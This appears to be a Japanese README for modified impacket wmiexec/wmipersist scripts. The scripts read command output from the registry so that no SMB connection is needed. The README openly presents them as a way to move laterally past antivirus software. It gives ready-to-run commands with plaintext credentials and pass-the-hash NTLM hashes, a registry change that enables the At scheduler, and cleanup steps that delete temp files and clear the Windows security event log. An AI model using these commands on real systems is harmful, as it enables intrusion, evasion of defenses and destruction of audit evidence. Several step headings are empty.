
impacket wmiexec.pyの修正版。レジストリから出力(データ、応答)を取得。SMB接続が不要。また、WMIHACKERのような横方向移動におけるアンチウイルスソフトウェアをバイパスする。
impacketのwmiexec.py、wmipersist.pyの修正版。レジストリから出力(データ、レスポンス)を取得します。SMB接続は不要ですが、コードは粗末です :(
元のwmiexec.pyでは、SMB接続(ポート445、139)からレスポンスを取得していました。残念ながら、一部のアンチウイルスソフトはこれらのポートを高リスクとして監視しています。
このケースでは、SMB接続機能を削除し、代わりに別の方法でコマンドを実行します。
キー: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\Configuration
名前: EnableAt
種類: REG_DWORD
値: 1
wmipersist-wip.py (強く推奨、!!!impacket v0.9.24でのみ動作!!!): WMIHACKERのPython版で、そこからVBSテンプレートを拝借しました。攻撃者はこれを使用して、アンチウイルスソフトウェアが動作している環境でも安全に横移動を行うことができます。
wmiexec-regOut.py: 単純なWin32_Process.createメソッドの例です。
ステップ1:
ステップ2:
ステップ3:
ステップ4:
ステップ5:
ステップ1:
ステップ2:
ステップ3:
基本的には、公式のimpacketをインストールするだけです。
平文パスワードの場合
python3 wmiexec-reg.py administrator:[email protected] 'whoami'

NTLMハッシュの場合
python3 wmiexec-reg.py -hashes e91d2eafde47de62c6c49a012b3a6af1:e91d2eafde47de62c6c49a012b3a6af1 [email protected] 'whoami'

平文パスワードの場合(出力なし)
python3 wmipersist-wip.py administrator:[email protected] 'command'

NTLMハッシュの場合
python3 wmipersist-wip.py -hashes e91d2eafde47de62c6c49a012b3a6af1:e91d2eafde47de62c6c49a012b3a6af1 [email protected] 'whoami'
コマンド実行後、出力がある場合は一時ディレクトリを忘れずにクリーンアップしてください。
コマンド: del /q /f /s C:\windows\temp\*

コマンドに二重引用符が含まれる場合。
一重引用符内に二重引用符を入れます wevtutil cl '"security"'


出力ありの場合
python3 wmipersist-wip.py administrator:[email protected] "whoami /priv" -with-output
python3 wmipersist-wip.py [email protected] "whoami /priv" -hashes e91d2eafde47de62c6c49a012b3a6af1:e91d2eafde47de62c6c49a012b3a6af1 -with-output

火绒(Huorong)アンチウイルスソフトウェア下(WMIHACKER VBSテンプレート使用!!!)
